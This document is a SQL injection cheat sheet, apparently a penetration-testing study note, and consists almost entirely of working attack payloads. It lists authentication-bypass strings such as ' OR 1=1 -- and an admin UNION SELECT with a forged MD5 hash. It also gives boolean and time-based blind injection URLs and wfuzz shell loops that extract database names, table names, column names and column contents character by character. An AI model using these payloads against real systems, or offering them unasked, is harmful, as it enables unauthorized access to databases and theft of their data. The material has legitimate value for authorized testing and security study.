██ Tests
# product.asp?id=4 (SMO)
product.asp?id=5-1
product.asp?id=4 OR 1=1
# product.asp?name=Book
product.asp?name=Bo'%2b'ok
product.asp?name=Bo' || 'ok (OM)
██ Bypasses
- ' OR 1=1 --
- ' OR 1=1 LIMIT 1 --
- ' OR 1=1 LIMIT 1#
- ' OR 1=1#
- ' OR 1=1--
- ' OR 1=1/*
- ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
- ') OR '1'='1--
- ') OR ('1'='1--
- 'OR 1#
- admin' #
- admin' --
- admin' AND 1=0 UNION ALL SELECT 'admin', '81dc...ed055' # MD5 hash bypass, MD5(1234)
- admin' OR 'a'='a
- admin' OR 1=1 --+
- admin' OR 1=1 LIMIT 1;#
- admin' OR 1=1;#
- admin'/*
██ Blind attacks
[ Source: https://github.com/ihack4falafel/OSCP/blob/master/Documents/SQL%20Injection%20Cheatsheet.md ]
▒▒ Logical operators
http://VAR_TARGET_HOST/index.php?id=<true value>' and sleep(1) #
http://VAR_TARGET_HOST/index.php?id=<false value>' or sleep(1) #
▒▒ Database name with boolean-based blind SQL injection with substr()
http://VAR_TARGET_HOST/index.php?id=1' and (substr(database(),<offset>,<character length>))='<character>' --+
▒▒ Database name with boolean-based blind SQL injection by observing HTTP response size with a combination of substr() and wfuzz, assuming the database name does not include special characters
for i in $(seq 1 10); do wfuzz -c -z list,a-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t-u-v-w-x-y-z --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (substr(database(),$i,1))='FUZZ' --+";done
▒▒ Database name with boolean-based blind SQL injection by observing http response size with substr(), ascii() and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (ascii(substr(database(),$i,1)))=FUZZ --+";done
▒▒ Table name with boolean-based blind SQL injection by observing HTTP response size with substr(), ascii(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),$i,1)))=FUZZ --+";done ## increment limit first argument by 1 to get the next available table name
▒▒ Column name with boolean-based blind SQL injection by observing HTTP response size with substr(), ascii(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw=<word count> "http://VAR_TARGET_HOST/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name=<table name> limit 0,1),$i,1)))=FUZZ --+";done ## increment limit first argument by 1 to get the next available column name
▒▒ Confirm time-based blind SQL injection using sleep() function
http://VAR_TARGET_HOST/index.php?id=1' and sleep(10) --+
▒▒ Database version with time-based blind SQL injection using sleep(), a LIKE pattern, and a conditional if(), assuming the back-end database is running version 5
http://VAR_TARGET_HOST/index.php?id=1' and if((select version()) like "5%", sleep(10), null) --+
▒▒ Database name with time-based blind SQL injection by observing HTTP response time with substr(), ascii(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if((ascii(substr(database(),$i,1)))=FUZZ, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt>
▒▒ Table name with time-based blind SQL injection by observing HTTP response time with substr(), ascii(), if(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if((select ascii(substr(table_name,$i,1))from information_schema.tables where table_schema=database() limit 0,1)=FUZZ, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt> ## increment limit first argument by 1 to get the next available table name
▒▒ Column name with time-based blind SQL injection by observing HTTP response time with substr(), ascii(), if(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if((select ascii(substr(column_name,$i,1))from information_schema.columns where table_name='<table name>' limit 0,1)=FUZZ, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt> ## increment limit first argument by 1 to get the next available column name
▒▒ Extract column content with time-based blind SQL injection by observing HTTP response time with substr(), ascii(), if(), and wfuzz. The below range is the standard ASCII characters (32-127)
for i in $(seq 1 10); do wfuzz -v -c -z range,0-10 -z range,32-127 "http://VAR_TARGET_HOST/index.php?id=1' and if(ascii(substr((select <column name> from <table name> limit FUZZ,1),$i,1))=FUZ2Z, sleep(10), null) --+";done > <filename.txt> && grep "0m9" <filename.txt> ## change <column name> to get the content of next column